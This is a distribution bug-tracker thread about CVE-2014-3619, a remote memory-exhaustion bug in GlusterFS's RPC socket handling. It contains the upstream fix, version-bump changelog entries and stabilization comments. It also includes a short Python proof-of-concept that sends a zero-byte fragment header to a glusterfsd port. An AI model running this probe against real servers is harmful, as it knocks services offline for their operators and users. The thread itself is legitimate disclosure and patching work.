From ${URL} :

Description of problem:
We construct some RPC messages and send them to the IP and port on which glusterfsd listens; the memory usage of the process grows quickly until memory is exhausted.

Version-Release number of selected component (if applicable): 3.3.0, 3.4.1, 3.5.0

Steps to Reproduce:
1. Start the glusterfs services and note the IP and port that one glusterfsd process listens on.
2. Run the attached python script, which connects to that IP and port and sends the four bytes 00 00 00 00 to the glusterfsd process (a sketch of such a probe is given at the end of this comment).
3. Watch the memory usage of the glusterfsd process. It grows quickly.

Actual results:
Memory usage of the glusterfsd process grows quickly until it is exhausted.

Expected results:
glusterfsd simply ignores the message.

Additional info:
The bug appears to be in __socket_proto_state_machine, which goes into an infinite loop allocating memory while handling this particular message. The message is the "multiple fragments in a single record" case, and some values are not reset before the next fragment is handled. We tested the fix below and it seems to work:

        if (!RPC_LASTFRAG (in->fraghdr)) {
+               in->pending_vector = in->vector;
+               in->pending_vector->iov_base = &in->fraghdr;
+               in->pending_vector->iov_len = sizeof (in->fraghdr);
                in->record_state = SP_STATE_READING_FRAGHDR;
                break;
        }

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know whether it is ready for stabilization or not.
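The upstream attachment is not reproduced here; the following is only a minimal sketch of the probe described in step 2, assuming a glusterfsd brick reachable at the placeholder HOST:PORT:

    #!/usr/bin/env python
    # Rough sketch only -- not the original attachment from the upstream report.
    # HOST and PORT are placeholders for the address one glusterfsd brick listens on.
    import socket

    HOST = "127.0.0.1"   # assumption: brick reachable locally
    PORT = 24009         # assumption: use the port shown for the brick process

    def send_zero_fraghdr(host, port):
        # Send a single 4-byte RPC record fragment header of all zeroes, then close.
        s = socket.create_connection((host, port))
        try:
            s.sendall(b"\x00\x00\x00\x00")
        finally:
            s.close()

    if __name__ == "__main__":
        send_zero_fraghdr(HOST, PORT)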
OK, I dropped all 3.4 versions from the tree and bumped 3.5.3, which is not vulnerable.

+*glusterfs-3.5.3 (23 Mar 2015)
+
+  23 Mar 2015; Ultrabug <ultrabug@gentoo.org> -glusterfs-3.3.0.ebuild,
+  -glusterfs-3.4.2-r1.ebuild, -glusterfs-3.4.4.ebuild,
+  -glusterfs-3.4.4-r2.ebuild, -glusterfs-3.5.1.ebuild, -glusterfs-3.5.2.ebuild,
+  +glusterfs-3.5.3.ebuild, +files/glusterd-r2.initd:
+  version bump, drop old and vulnerable wrt #541540, fix #536606 thx to Jaco
+  Kroon, fix #529676 thx to Christian Affolter
+
CVE-2014-3619 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3619): The __socket_proto_state_machine function in GlusterFS 3.5 allows remote attackers to cause a denial of service (infinite loop) via a "00000000" fragment header.
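For context, the 4-byte fragment header is standard ONC RPC record marking: the most significant bit is the last-fragment flag (what RPC_LASTFRAG checks) and the remaining 31 bits are the fragment length. A small illustration of mine, not code from GlusterFS, showing why an all-zero header means "not the last fragment, zero payload bytes":

    import struct

    def decode_fraghdr(hdr):
        # Decode a 4-byte ONC RPC record-marking fragment header.
        (word,) = struct.unpack(">I", hdr)
        last_frag = bool(word & 0x80000000)   # top bit: last fragment of the record
        length = word & 0x7fffffff            # low 31 bits: fragment length in bytes
        return last_frag, length

    # b"\x00\x00\x00\x00" decodes to (False, 0): "more fragments follow, this one is
    # empty", which is the case the unpatched state machine mishandles.
    print(decode_fraghdr(b"\x00\x00\x00\x00"))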
@ Arches, please test and mark stable: =sys-cluster/glusterfs-3.6.5
amd64 stable
x86 stable
*** Bug 484016 has been marked as a duplicate of this bug. ***
ppc stable
ppc64 stable. Maintainer(s), please cleanup. Security, please vote.
GLSA Vote: No @ Maintainer(s): Please cleanup and drop =sys-cluster/glusterfs-3.1.2!
Cleanup done
All done, repository is clean.